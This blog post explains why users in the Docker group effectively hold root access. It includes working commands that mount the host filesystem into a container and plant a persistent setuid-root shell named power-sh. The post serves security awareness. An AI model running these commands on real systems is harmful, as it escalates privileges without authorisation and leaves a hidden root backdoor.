Docker group security
Most Docker quick start guides give you a trick on how to use it without typing sudo every time.
Is it handy? Sure. Is it safe? …
$ sudo gpasswd -a $USER docker
What happened when you typed that in your terminal?
Well, as expected, it added the current user to the docker group.
Docker is ready for that change: it allows any user in that group (along with the root user) to use all the available docker commands.
The only issue is that you always have root privileges while using containers, which means that if you could link the host machine to the container, you could actually have unlimited root access.
What’s the matter? Docker actually provides a way to link the host and the container, volumes.
So… Do you want root access on your computer, without having to sudo?
$ docker run -ti -v /:/host debian chroot /host
Do you want a root shell, that you could use anytime?
$ docker run -v /:/host -t debian /bin/sh -c 'cp /bin/sh /host/bin/power-sh && chown root.root /host/bin/power-sh && chmod a+s /host/bin/power-sh'
$ power-sh
$ whoami
root
I hope you don’t need any other examples ~
TLDR? Anyone in the docker group has actually unlimited and unrestricted root access.
But you should not be afraid ; it’s not a bug but a feature.
« Scripting languages and viruses
Skip lists »